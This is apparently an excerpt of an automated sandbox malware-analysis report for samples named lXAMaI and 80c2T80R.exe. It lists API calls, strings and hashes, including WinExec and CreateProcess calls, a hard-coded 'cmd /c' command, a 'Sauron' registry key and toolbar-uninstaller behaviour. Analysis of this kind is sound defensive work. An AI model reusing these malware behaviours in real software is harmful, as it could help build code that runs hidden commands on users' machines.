Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID:
String ID: c:\%s
API String ID: 0-3279930864
Opcode ID: d065a3fe7525e56b8b0292b69bdc733e6da7a74620a1ccf7e9cc90a5fb608ae2
Instruction ID: ec0fc2cc1dfc30a0ce94d78aa0023102eec84316e4b322fc16e82c358771ff44
Opcode Fuzzy Hash: d065a3fe7525e56b8b0292b69bdc733e6da7a74620a1ccf7e9cc90a5fb608ae2
Instruction Fuzzy Hash: 8631D5B1D0020DBBEB10CBA4CC45BEEB7B4FB24340F1049B9F945A6285E775AB948B91

Function 035A8F69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 035A8FB5
GetFileType.KERNEL32(00000000), ref: 035A8FC7

Strings

P$q, xrefs: 035A8FF8

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: FileHandleType
String ID: P$q
API String ID: 3000768030-1159157678
Opcode ID: 07b4e4510ced5637e5ffe685f55c9af32bbdbbdff78933b0563edb77bc58d1f2
Instruction ID: 7e07a1ec8f64643991e14e007b225396aeeba401f89dd44dbbdc769270e40731
Opcode Fuzzy Hash: 07b4e4510ced5637e5ffe685f55c9af32bbdbbdff78933b0563edb77bc58d1f2
Instruction Fuzzy Hash: 4411B431504F124ACB30C93DAC88A2AFE96BB42270B2C0B5AD5F6D65F5D330D586F641

Function 10002152 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54processCOMMON

Download Yara Rule

APIs

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

WinExec.KERNEL32(?,00000000), ref: 100021E8

Strings

C:\ProgramData\xxxx\xxx.ini, xrefs: 1000215D
C:\ProgramData\xxxx\xxx.ini, xrefs: 100021FF

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AttributesErrorExecFileLast
String ID: C:\ProgramData\xxxx\xxx.ini$C:\ProgramData\xxxx\xxx.ini
API String ID: 2627963779-648299014
Opcode ID: ccb391a370b77a5f721456bd667def8112ac487089afa371016e9a2bf970ebcf
Instruction ID: b437f8699be40d9183df46b52527e6aa7e3621b434e5a985d3ecd75017b85f3a
Opcode Fuzzy Hash: ccb391a370b77a5f721456bd667def8112ac487089afa371016e9a2bf970ebcf
Instruction Fuzzy Hash: A901C8FAC4011477D711D660AC82FED3328DB24300F0442A5FB499A185FA71EAE487A3

Function 10009ED9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54processCOMMON

Download Yara Rule

APIs

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

WinExec.KERNEL32(?,00000000), ref: 10009F6F

Strings

C:\ProgramData\xxxx\xxx.ini, xrefs: 10009F86
C:\ProgramData\xxxx\xxx.ini, xrefs: 10009EE4

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AttributesErrorExecFileLast
String ID: C:\ProgramData\xxxx\xxx.ini$C:\ProgramData\xxxx\xxx.ini
API String ID: 2627963779-648299014
Opcode ID: 26ecceae42fb20f0f1f3e8a6b6dbb0eb96cd19e5a463cef8d89b66da9137859a
Instruction ID: f56c3def77850225ffbcfdecafa87ad64a8553bde5a81516cbb130391a64fa86
Opcode Fuzzy Hash: 26ecceae42fb20f0f1f3e8a6b6dbb0eb96cd19e5a463cef8d89b66da9137859a
Instruction Fuzzy Hash: B80161FAD0410467EB11D6609C82FED7328DB25344F1446B4FB49AA181FA71AAE487A3

Function 100059C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46processstringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00000000,?), ref: 100059F8
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005A66

Strings

D, xrefs: 10005A17

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CreateProcesslstrcpy
String ID: D
API String ID: 3871208750-2746444292
Opcode ID: 916d2d186ac110a5a965dfb354bc5e034f77e2c81c1dae09f6250b621f7992ec
Instruction ID: b395a6151620d5e41b258ce27ec498e0e6f271e21509d20b4a1301451880e645
Opcode Fuzzy Hash: 916d2d186ac110a5a965dfb354bc5e034f77e2c81c1dae09f6250b621f7992ec
Instruction Fuzzy Hash: 09014C7190022CDBEB60CF50CC85BEFB7B4EB49345F4045DAE6096A280DBB61AC9CF91

Function 1000BBCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,1000B6A1), ref: 1000BC2E

Strings

SOFTWARE\, xrefs: 1000BBEF
Sauron, xrefs: 1000BC03

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Open
String ID: SOFTWARE\$Sauron
API String ID: 71445658-3239576343
Opcode ID: d56acd28a2bd1907b8a71c6b44a23af7e12cc221573825668608f8a9142e9123
Instruction ID: a22542902ff6f56eb0d630748cb41b7a28a263f74af5c2968be266f8f7edb185
Opcode Fuzzy Hash: d56acd28a2bd1907b8a71c6b44a23af7e12cc221573825668608f8a9142e9123
Instruction Fuzzy Hash: 28F0BB75E141087AF750D6A4DC01FE5B26CDB64704F1005F5EB88F6142EFB5AAD48AA1

Function 1001CE9A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001CE9F

Part of subcall function 1001CEF4: __EH_prolog.LIBCMT ref: 1001CEF9

Part of subcall function 1001200C: RaiseException.KERNEL32(1001D112,?,?,00000000,?,invalid string position,1001D112,?,1002A9A8,?,invalid string position,00000000,00000000), ref: 1001203A

Strings

string too long, xrefs: 1001CEB8, 1001CEBD, 1001CEC5
ios::failbit set, xrefs: 1001CEAA

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: H_prolog$ExceptionRaise
String ID: ios::failbit set$string too long
API String ID: 2062786585-1331328489
Opcode ID: bf4ce6de7af943d878d3a016783647bad95a33d810114c2f831f6856d2ac0380
Instruction ID: fdc6ee933de87c4d9a05ec026629d2857aa2bbdfc2f882f2b12bc9f904b7cb89
Opcode Fuzzy Hash: bf4ce6de7af943d878d3a016783647bad95a33d810114c2f831f6856d2ac0380
Instruction Fuzzy Hash: 55F01C7AC0116CAEEB04EBA4EC41AEEB77CEF19110FD00159F551B6152DF38A648CBB5

Function 100053B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7processCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c echo.>c:\del & exit,00000000), ref: 100053BE
ExitProcess.KERNEL32 ref: 100053C6

Strings

cmd /c echo.>c:\del & exit, xrefs: 100053B9

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ExecExitProcess
String ID: cmd /c echo.>c:\del & exit
API String ID: 4112423671-3921158289
Opcode ID: 5cbbdacac1079abe4ba559db447da5ec93e178f5dd81e32ee01167184d10ea60
Instruction ID: e5d9ff66cc0e142b26f2c8affca60cfa8280b984bc7069711490e213eba440c2
Opcode Fuzzy Hash: 5cbbdacac1079abe4ba559db447da5ec93e178f5dd81e32ee01167184d10ea60
Instruction Fuzzy Hash: F2B09230148214EBF25167A08C4AB4D3924BB08743FA00094F309980D19B9010068652

Function 035AA501 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 035AA501
GetCommandLineW.KERNEL32 ref: 035AA50C

Strings

8$e, xrefs: 035AA507

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: CommandLine
String ID: 8$e
API String ID: 3253501508-420026699
Opcode ID: db46a987f003fdb9241286a8c3f59c5467d541eaafa74b6d5bd15565decff3d3
Instruction ID: d7b6b95312cadd2cc4daddb3048029f1e4f5baa936004a796e7c48a42cf063c0
Opcode Fuzzy Hash: db46a987f003fdb9241286a8c3f59c5467d541eaafa74b6d5bd15565decff3d3
Instruction Fuzzy Hash: 39B0087C8412058BDB85AFA4A518A44BAF4BB586023C09596D5E6936B8F735400AEA14

Function 0360A501 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0360A501
GetCommandLineW.KERNEL32 ref: 0360A50C

Strings

8$e, xrefs: 0360A507

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: CommandLine
String ID: 8$e
API String ID: 3253501508-420026699
Opcode ID: 5a31a9b4f62d47d00c563d9d2ac16b4f20f59a294845cb6953fd6b158d45bfd3
Instruction ID: af911df31dadcc140b3233338adf15606ccbac23caa3c8a8ac35158f90bf85b4
Opcode Fuzzy Hash: 5a31a9b4f62d47d00c563d9d2ac16b4f20f59a294845cb6953fd6b158d45bfd3
Instruction Fuzzy Hash: 56B0087C8412018BD741AFA4A528148BAF0B659602399A597D566D379CD7394015DA24

Function 10017ADE Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,100178A6,00000000,?,00000000,10012F99,?,00000000,100107FA,00000000,00000000), ref: 10017B06
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100178A6,00000000,?,00000000,10012F99,?,00000000,100107FA,00000000,00000000), ref: 10017B3A
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10017B54
HeapFree.KERNEL32(00000000,?), ref: 10017B6B

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: c9c277f1b9cc43fa70d1f33ae8de79aacbb8090d52dee2a430e7c2b64a5ccdb2
Instruction ID: 4fc6593fee77e220fe1bcaac1c798842ce902506cafc599559485fab37c64c47
Opcode Fuzzy Hash: c9c277f1b9cc43fa70d1f33ae8de79aacbb8090d52dee2a430e7c2b64a5ccdb2
Instruction Fuzzy Hash: CF113A70608769AFE721CF59CCC5A167BF6FB8E7507204619F255C71B0D370A896DB10

Function 1002559A Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10058438,?,00000000,?,00000002,10025480,00000010,?,00000100,00000002,?,?,1002503F,10025086,1002506D,1002137A), ref: 100255D5
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000002,10025480,00000010,?,00000100,00000002,?,?,1002503F,10025086,1002506D,1002137A), ref: 100255E7
LeaveCriticalSection.KERNEL32(10058438,?,00000000,?,00000002,10025480,00000010,?,00000100,00000002,?,?,1002503F,10025086,1002506D,1002137A), ref: 100255F0
EnterCriticalSection.KERNEL32(00000000,00000000,?,00000002,10025480,00000010,?,00000100,00000002,?,?,1002503F,10025086,1002506D,1002137A,00000100), ref: 10025602

Part of subcall function 10025555: GetVersion.KERNEL32(?,100255AA,00000002,10025480,00000010,?,00000100,00000002,?,?,1002503F,10025086,1002506D,1002137A,00000100,10021313), ref: 10025568

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 11322e179f25377749562644c01e891bb5233f6e63a9a159df93a008ffcfdfe1
Instruction ID: ec9998dac0dbd1f55875a55374eafb7bffba0d621d67fd735fff1fc425e6aa61
Opcode Fuzzy Hash: 11322e179f25377749562644c01e891bb5233f6e63a9a159df93a008ffcfdfe1
Instruction Fuzzy Hash: 7AF04F7540063BDFD700DF98DCD4956B3ADFB00357B91042AEE06A2021E736A655CFA4

Function 1001525F Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,10015022,?,10013923), ref: 1001526C
InitializeCriticalSection.KERNEL32 ref: 10015274
InitializeCriticalSection.KERNEL32 ref: 1001527C
InitializeCriticalSection.KERNEL32 ref: 10015284

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: b51eeb1d4d24f408d5510cd8d3b968f9bdbcd862057d232c17604fdf5a978755
Instruction ID: 0e25bf321dd3248969ff3eb25390245dd2163044fb52d9fa4e0b6641def2ffdf
Opcode Fuzzy Hash: b51eeb1d4d24f408d5510cd8d3b968f9bdbcd862057d232c17604fdf5a978755
Instruction Fuzzy Hash: 2DC002319015359EEB11AB55FC8484F3F25FB042613254163F54451030DA211D21DFD0

Analysis Process: 80c2T80R.exePID: 6972, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1048
Total number of Limit Nodes:	29

Executed Functions

Function 00421000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00421006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00421013
GetLastError.KERNEL32 ref: 0042101F
GetCommandLineW.KERNEL32(?), ref: 00421040
CommandLineToArgvW.SHELL32(00000000), ref: 00421047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00421061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00421073
LoadLibraryW.KERNELBASE(?), ref: 00421085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00421097
FreeLibrary.KERNELBASE(00000000), ref: 004210A4
CloseHandle.KERNELBASE(00000000), ref: 004210AB
CoUninitialize.COMBASE ref: 004210B1
LocalFree.KERNEL32(00000000), ref: 004210BC

Strings

Global\IEToolbarUninstaller, xrefs: 0042100C
MyUnregisterServer, xrefs: 00421091
tbcore3U.dll, xrefs: 0042106E, 00421079
tbcore3.dll, xrefs: 0042105C, 00421067

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: 614c3f6781ed148f4695f325c5a4f3a243bc6e70c91eb8837c4ed052f9365d14
Instruction ID: 0ea9937792c3347de60bd06e6ecb05012a6ba1075db412417d13a85e08a6346d
Opcode Fuzzy Hash: 614c3f6781ed148f4695f325c5a4f3a243bc6e70c91eb8837c4ed052f9365d14
Instruction Fuzzy Hash: D811E432706275EB83309B60BC08A6F3798AE64751B92453FF942D2560CF288C46C6BE

Function 00421465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 0042146D

Part of subcall function 0042143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00421472,?,?,004254EE,000000FF,0000001E,?,004236FC,?,00000001,?,?,00422A2A,00000018), ref: 00421444
Part of subcall function 0042143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00421454

ExitProcess.KERNEL32 ref: 00421476

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: ab52e28ae70cca5f9447af6945a2c96814af380c361eec43886201b556f00f6f
Instruction ID: c020146a25f6e4a021be38c56f0808b766ed3fbf98e5279d03be2afdd9e8cda6
Opcode Fuzzy Hash: ab52e28ae70cca5f9447af6945a2c96814af380c361eec43886201b556f00f6f
Instruction Fuzzy Hash: 5AB09231100108BBDB123F12EC0AD4D7F2AFB813A4BA1802AF80C49031DF76AD929A98

Function 0042261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00422630

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b2d6d4ac10143beca0484824dda4626e39377e5f6805be40e3cd9227c5537775
Instruction ID: e8d44c90e875a880b534bf0536eca3200992804e1ee99eda70aa82066c99ed3d
Opcode Fuzzy Hash: b2d6d4ac10143beca0484824dda4626e39377e5f6805be40e3cd9227c5537775
Instruction Fuzzy Hash: 44D0A7327543456EDB205F717C487263BDCD3C4795F504436B90CC6260F674D592CA4C

Function 00421681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0042168D

Part of subcall function 00421555: __lock.LIBCMT ref: 00421563
Part of subcall function 00421555: __decode_pointer.LIBCMT ref: 0042159A
Part of subcall function 00421555: __decode_pointer.LIBCMT ref: 004215AF
Part of subcall function 00421555: __decode_pointer.LIBCMT ref: 004215D9
Part of subcall function 00421555: __decode_pointer.LIBCMT ref: 004215EF
Part of subcall function 00421555: __decode_pointer.LIBCMT ref: 004215FC
Part of subcall function 00421555: __initterm.LIBCMT ref: 0042162B
Part of subcall function 00421555: __initterm.LIBCMT ref: 0042163B

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 88264c235f943a501a12dca63b8f93138b70e614509b31654e6b7158c68e5484
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: ECB0923268020833DB202586AC03F063A0987D0BA4E650061FA0D191F1A9A2A9A1808A

Non-executed Functions

Function 004210CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00421346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042135B
UnhandledExceptionFilter.KERNEL32(0042816C), ref: 00421366
GetCurrentProcess.KERNEL32(C0000409), ref: 00421382
TerminateProcess.KERNEL32(00000000), ref: 00421389

Memory Dump Source

Source File: 00000009.00000002.2825964972.0000000000421000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00420000, based on PE: true

Associated: 00000009.00000002.2825941774.0000000000420000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2825983477.0000000000428000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826000589.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2826018247.000000000042C000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_420000_80c2T80R.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 82313b86be6aa325bcdbb2de17f5a91d720433a1203ac24aa7a233872a03c71d
